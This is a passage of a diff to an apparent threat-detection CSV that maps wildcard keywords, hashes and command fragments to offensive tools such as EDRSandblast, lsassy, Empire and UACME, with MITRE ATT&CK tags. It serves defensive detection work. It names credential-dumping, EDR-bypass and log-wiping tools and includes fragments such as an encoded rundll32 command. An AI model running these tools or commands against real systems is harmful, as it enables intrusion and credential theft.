payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*EasyPersistent.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*EasyPersistent.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*Ebowla-master.zip*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*echo * > \\.\pipe\*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*echo * > \\.\pipe\*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*echo */24 | dnsx -silent -resp-only -ptr*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*echo 123 > c:\windows\temp\test.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*echo 123 > c:\windows\temp\test.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*echo '8.8.8.8' | hakrevdns*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*echo -n 'cmd /c start rundll32 *.dll* | base64*","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*echo 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*echoac-poc-main*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" "*echowrecker*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. 
There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*ecryptfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ecs_task_def_data/all_task_def.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*ecryptfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ecs_task_def_data/all_task_def.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*Ed1s0nZ/cool/*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" -"*edge_wscript_wsh_injection*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*edge_wscript_wsh_injection*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*edge1.parrot.run*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*EditC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*edraser.py -*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*EDRaser-main*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*EDRSandblast.c*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*EDRSandblast.exe*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - 
T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandBlast.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*edrsandblast.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandBlast.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*edrsandblast.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*EDRSandblast.sln*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast.vcxproj*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_API.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_API.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_API.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast.vcxproj*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_CLI*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*EDRSandblast_LsassDump*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast_LsassDump.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*EDRSandblast_LsassDump.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_LsassDump.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_LsassDump.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_StaticLibrary*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*EDRSandblast-GodFault*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast-GodFault*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast-master*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*EEC35BCF-E990-4260-828D-2B4F9AC97269*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*eeriedusk/nysm*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*eeriedusk/nysm*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate 